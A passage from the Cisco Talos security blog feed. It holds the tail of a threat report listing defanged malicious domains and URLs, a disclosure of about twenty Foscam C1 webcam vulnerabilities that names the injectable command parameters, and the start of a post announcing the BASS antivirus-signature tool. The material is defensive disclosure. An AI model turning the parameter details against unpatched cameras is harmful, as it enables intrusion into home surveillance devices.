5f5af4762c073234fef6bfeaa3b9f6a04982e82a25e540116aa1f9e38223ae2b&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.r55c8jr4gcmu"&gt;Domains&lt;/h3&gt;&lt;br /&gt;feteh-asefa[.]com&lt;br /&gt;&lt;br /&gt;sheldon-cooper[.]info&lt;br /&gt;&lt;br /&gt;camilleoconnell[.]website&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.nnjxx82ean4t"&gt;URLs&lt;/h3&gt;&lt;br /&gt;http://sheldon-cooper[.]info/Fuqha_NewDetails_docx.r10&lt;br /&gt;&lt;br 
/&gt;http://feteh-asefa[.]com/pc/public/Fuqha_NewDetails_docx.r10&lt;br /&gt;&lt;br /&gt;http://feteh-asefa[.]com/pc/public/Altarnatevs.r10&lt;br /&gt;&lt;br /&gt;https://sheldon-cooper[.]info/attachment.r10&lt;br /&gt;&lt;br /&gt;http://camilleoconnell[.]website/api/white_walkers/new&lt;br /&gt;&lt;br /&gt;http://camilleoconnell[.]website/api/white_walkers/[base64]/requests&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.vurr3jvn6g64"&gt;Coverage&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.&lt;br /&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-jE3oS9eR8vQ/WUfuEo-5ohI/AAAAAAAAAUQ/bgPSvwPonqkqaQIudwn7BUEuMhJrcr_MQCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="911" data-original-width="1086" height="536" src="https://2.bp.blogspot.com/-jE3oS9eR8vQ/WUfuEo-5ohI/AAAAAAAAAUQ/bgPSvwPonqkqaQIudwn7BUEuMhJrcr_MQCLcBGAs/s640/image5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. &lt;br /&gt;&lt;br /&gt;CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks. &lt;br /&gt;&lt;br /&gt;Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. &lt;br /&gt;&lt;br /&gt;Umbrella prevents DNS resolution of the domains associated with malicious activity. 
&lt;br /&gt;&lt;br /&gt;Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-19T11:48:04.796-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-3a42reuT9u0/WUftPtxDtnI/AAAAAAAAATo/4DKV8eEdl5wfFFexC9q8euth1clcSj1fwCLcBGAs/s72-c/image2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/palestine-delphi.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/NJYd2ILj-uQ/foscam-vuln-details.html</link><category>0-day</category><category>IoT</category><category>Talos</category><category>Vulnerability Research</category><category>vulnerability spotlight</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Mon, 19 Jun 2017 08:45:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6812024606427304106</guid><description>&lt;h2 id="h.4x9n64h9k27j"&gt;Executive Summary&lt;/h2&gt;The Foscam C1 is a webcam that is marketed for use in a variety of applications including home security monitoring. As an indoor webcam, it is designed to be set up inside of a building and features the ability to be accessed remotely via a web interface or from within a mobile application. Talos recently identified several vulnerabilities in the Foscam C1 camera that could be used by attackers for a variety of purposes, including access and retrieval of sensitive information stored on the camera, execution of arbitrary commands within the camera's operating system, and, in several cases, complete compromise of the device. 
As these cameras are commonly deployed in sensitive locations and used as baby monitors, security cameras, etc., it is recommended that affected devices be updated as quickly as possible to ensure that they are no longer vulnerable.&lt;br /&gt;&lt;br /&gt;In accordance with our responsible disclosure policy, Talos has worked with Foscam to resolve these issues, which has resulted in the release of a firmware update addressing them.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.om6cexyys78v"&gt;Vulnerability Details&lt;/h2&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Foscam C1 Webcam FTP Hard Coded Password Vulnerability (TALOS-2016-0245 / CVE-2016-8731)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Richard Harman and Dave McDaniel of Talos&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Talos recently discovered that Foscam C1 Indoor HD Cameras contain undocumented, hardcoded FTP credentials that could allow an attacker to remotely log in to affected devices and gain full read and write access to the Micro-SD card mounted within the device. This access could be used to obtain sensitive information such as audio and video recordings, images, and other data stored on the Micro-SD card. This vulnerability, TALOS-2016-0245, has been assigned CVE-2016-8731. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0245/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera WebService CGI Parameter Code Execution Vulnerability (TALOS-2017-0299 / CVE-2017-2805)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a stack-based buffer overflow in the "CGIProxy.fcgi" service of the web management interface. An attacker could use a specially crafted HTTP request to trigger this overflow condition. 
This vulnerability could be leveraged by an attacker to achieve code execution on vulnerable devices. This vulnerability, TALOS-2017-0299, has been assigned CVE-2017-2805. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0299/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Account Creation Command Injection Vulnerability (TALOS-2017-0328 / CVE-2017-2827)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service of the web management interface. An attacker could insert arbitrary characters into the "addAccount" command via either the "usrName" or "usrPwd" parameters, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. This vulnerability, TALOS-2017-0328, has been assigned CVE-2017-2827. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0328/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Account Password Command Injection Vulnerability (TALOS-2017-0329 / CVE-2017-2828)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service of the web management interface. An attacker could insert arbitrary characters into the "changePassword" command during the account password change process, resulting in execution of arbitrary OS commands. 
Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0329 has been assigned CVE-2017-2828. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0329/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability (TALOS-2017-0330 / CVE-2017-2829)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a directory traversal vulnerability present in the "CGIProxy.fcgi" service of the web management interface. This vulnerability could allow an attacker to retrieve arbitrary files from the camera using an HTTP request. This could result in the disclosure of sensitive information. This vulnerability is due to a failure to adequately sanitize user input and could allow an attacker to traverse outside of the intended directory structure of the web interface. TALOS-2017-0330 has been assigned CVE-2017-2829. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0330/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability (TALOS-2017-0331 / CVE-2017-2830)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the "CGIProxy.fcgi" service of the web management interface. Exploitation of this vulnerability could result in the execution of arbitrary code on affected devices. 
An attacker could trigger this vulnerability using a specially crafted HTTP request to overwrite the buffer on the stack and ultimately obtain control over code execution flow within the device. This vulnerability is due to a failure of the device to perform proper bounds checking on input received from users. TALOS-2017-0331 has been assigned CVE-2017-2830. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0331/"&gt;here&lt;/a&gt;.   &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Query Append Code Execution Vulnerability (TALOS-2017-0332 / CVE-2017-2831)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the "FCGX_Init" function within the "CGIProxy.fcgi" service of the web management interface. An attacker could leverage this vulnerability to obtain remote code execution on affected devices. This vulnerability could be triggered using a specially crafted HTTP request and allow an attacker to overwrite the buffer or obtain control over code execution flow within affected devices. TALOS-2017-0332 has been assigned CVE-2017-2831. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0332/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability (TALOS-2017-0334 / CVE-2017-2833)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present within the "webService" application that is launched by the device during the bootup process. 
An attacker could leverage this vulnerability to execute operating system commands on the device during device startup. This vulnerability can be exploited using any command that allows for changing an account password (e.g. changePassword). During startup the FTP service is configured using shell commands without sanitizing the password parameter, resulting in execution of the attacker-supplied commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. The injected command would then be executed once the device reboots. TALOS-2017-0334 has been assigned CVE-2017-2833. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0334/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Account Deletion Command Injection Vulnerability (TALOS-2017-0335 / CVE-2017-2832)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the Account Deletion process within the web interface. An attacker could exploit this vulnerability using a specially crafted HTTP request. The vulnerability is triggered when the "delAccount" command is invoked. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0335 has been assigned CVE-2017-2832. 
For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0335/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability (TALOS-2017-0343 / CVE-2017-2841)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Host" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0343 has been assigned CVE-2017-2841. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0343/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability (TALOS-2017-0344 / CVE-2017-2842)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. 
This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test User" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0344 has been assigned CVE-2017-2842. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0344/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability (TALOS-2017-0345 / CVE-2017-2843)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Password" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0345 has been assigned CVE-2017-2843. 
For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0345/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability (TALOS-2017-0346 / CVE-2017-2844)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Sender" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0346 has been assigned CVE-2017-2844. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0346/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Command Injection Vulnerability (TALOS-2017-0347 / CVE-2017-2845)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the SMTP configuration testing process. 
This vulnerability can be reached by invoking the "smtpTest" command and injecting attacker specified operating system commands. A specially crafted HTTP request can be used to exploit this vulnerability. This vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0347 has been assigned CVE-2017-2845. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0347/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability (TALOS-2017-0348 / CVE-2017-2846)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "Gateway Address" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0348 has been assigned CVE-2017-2846. 
For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0348/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability (TALOS-2017-0349 / CVE-2017-2847)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "DNS1" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0349 has been assigned CVE-2017-2847. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0349/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability (TALOS-2017-0350 / CVE-2017-2848)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. 
This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "DNS2" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0350 has been assigned CVE-2017-2848. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0350/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability (TALOS-2017-0351 / CVE-2017-2849)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with NTP server address configuration. This vulnerability can be reached by invoking the "setSystemTime" command and injecting commands into the "ntpServer" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0351 has been assigned CVE-2017-2849. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0351/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability (TALOS-2017-0352 / CVE-2017-2850)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to an injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. 
This vulnerability could allow an attacker to inject arbitrary operating system commands into the "pureftpd.passwd" configuration file on the device during a username change operation, enabling the attacker to break out of the chroot environment associated with the FTP service on the device. This vulnerability could be used to escalate privileges on affected devices. This vulnerability is reachable by invoking the "changeUserName" command and requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0352 has been assigned CVE-2017-2850. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0352/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Wifi Settings Code Execution Vulnerability (TALOS-2017-0353 / CVE-2017-2851)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability can be exploited using a specially crafted HTTP request during the WiFi configuration on the device. This vulnerability could allow an attacker to overwrite the buffer and potentially lead to remote code execution on affected devices. This vulnerability is reachable by invoking the "setWifiSetting" command. Exploitation of this vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0353 has been assigned CVE-2017-2851. 
For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0353/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.7lv692mu22vr"&gt;Versions Tested&lt;/h2&gt;Talos has tested and confirmed that the following Foscam firmware versions are affected:&lt;br /&gt;&lt;br /&gt;Foscam, Inc. Indoor IP Camera C1 Series&lt;br /&gt;System Firmware Version: 1.9.3.17&lt;br /&gt;Application Firmware Version: 2.52.2.37&lt;br /&gt;Web Version: 2.0.1.1&lt;br /&gt;Plug-In Version: 3.3.0.5&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.20my9pwfiqmo"&gt;Conclusion&lt;/h2&gt;One of the most commonly deployed IP cameras is the Foscam C1. In many cases these devices may be deployed in sensitive locations. They are marketed for use in security monitoring and many use these devices to monitor their homes, children, and pets remotely. As such, it is highly recommended that the firmware running on these devices be kept up-to-date to ensure the integrity of the devices, as well as the confidentiality of the information and environments that they are monitoring. Foscam has released a firmware update, version &lt;a href="http://www.foscam.com/downloads/firmware_details.html?id=1"&gt;V-2.x.2.43&lt;/a&gt;, to resolve these issues. Users of the affected devices should update to this new version as quickly as is operationally feasible to ensure that their devices are not vulnerable.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.halfffbm6urf"&gt;Coverage&lt;/h2&gt;The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules:&lt;br /&gt;40908-40909&lt;br /&gt;42078&lt;br /&gt;42431-42437&lt;br /&gt;43005&lt;br /&gt;43061</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-19T12:16:13.567-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/foscam-vuln-details.html</feedburner:origLink></item><item><title>BASS - BASS Automated Signature Synthesizer</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/_iH94chsP2c/bass-signature.html</link><category>Automation</category><category>ClamAV</category><category>conferences</category><category>Framework</category><category>Malware Research</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Mon, 19 Jun 2017 02:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-464058494870878630</guid><description>&lt;i&gt;This blog post was authored by &lt;a href="https://twitter.com/jzaddach"&gt;Jonas Zaddach&lt;/a&gt; and &lt;a href="https://twitter.com/emd3l"&gt;Mariano Graziano&lt;/a&gt;.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.vorb53tsb1tc"&gt;Executive Summary&lt;/h2&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-pk1493FXOWQ/WUf8Wn4D6II/AAAAAAAABGA/PcekxM5hnPoEgzuJfyUoS3AiQvQqG72DQCLcBGAs/s1600/BASS_logo_fullcolor_ondark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="915" data-original-width="1600" height="227" src="https://2.bp.blogspot.com/-pk1493FXOWQ/WUf8Wn4D6II/AAAAAAAABGA/PcekxM5hnPoEgzuJfyUoS3AiQvQqG72DQCLcBGAs/s400/BASS_logo_fullcolor_ondark.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Given the rapid pace of change in the threat landscape, with new threats emerging and existing ones evolving, there are bound to be challenges defenders face. 
These challenges can manifest in multiple ways, such as processing and analyzing millions of new and unknown samples received each day. Other challenges include managing resource constraints for our tools used to automate malware analysis, developing antivirus signatures in an efficient manner that will identify malware families, and ensuring tools are able to scale as the number of samples needing to be analyzed increases. To help address these challenges, Talos is releasing a new open source framework called BASS.&lt;br /&gt;&lt;br /&gt;BASS (pronounced "bæs") is a framework designed to automatically generate antivirus signatures from samples belonging to previously generated malware clusters. It is meant to reduce resource usage of ClamAV by producing more pattern-based signatures as opposed to hash-based signatures, and to alleviate the workload of analysts who write pattern-based signatures. The framework is easily scalable thanks to Docker.  &lt;br /&gt;&lt;br /&gt;Please note that this framework is still considered in the Alpha stage and as a result, it will have some rough edges. As this tool is open source and actively maintained by us, we gladly welcome any feedback from the community on improving the functionality of BASS. You can find source code for BASS here:&lt;br /&gt;&lt;br /&gt;&lt;a href="https://github.com/Cisco-Talos/bass"&gt;https://github.com/Cisco-Talos/bass&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;BASS was announced at &lt;a href="https://recon.cx/2017/montreal/"&gt;REcon&lt;/a&gt; 2017 in Montreal, Canada.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h2 id="h.mm6mdfu1bwcp"&gt;Motivation&lt;/h2&gt;&lt;br /&gt;Talos receives about 1.5 million unique samples per day. While most of these samples are known threats that can be filtered out with a malware scan (with ClamAV) right away, a good portion of files remain where further analysis is necessary. 
At this point, we perform dynamic analysis on this subset where those files will be run in our sandbox, and then be classified as malicious or not malicious. The remaining portion of malicious files needs to be processed further to generate ClamAV signatures which will filter this threat in the earlier-stage malware scan in the future.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Iv0dagLicvo/WUltDrQpb_I/AAAAAAAAAQ4/mKnESgZvgic65L9fFhTAGQluxvjxirXWACK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B1.jpg" imageanchor="1"&gt;&lt;img border="0" height="308" src="https://3.bp.blogspot.com/-Iv0dagLicvo/WUltDrQpb_I/AAAAAAAAAQ4/mKnESgZvgic65L9fFhTAGQluxvjxirXWACK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B1.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;ClamAV's database increased by about 560,000 signatures in a three-month period (February to April) in 2017, which amounts to 9,500 signatures daily. A large part of these signatures is generated automatically as hash-based signatures. Compared to pattern-based or bytecode-based signatures (the other two main signature types which ClamAV supports), hash-based signatures have the disadvantage of only matching a single file per signature. Additionally, a high number of signatures translates to an increased footprint of ClamAV's signature database in memory. For this reason, we would prefer to have more pattern-based signatures, 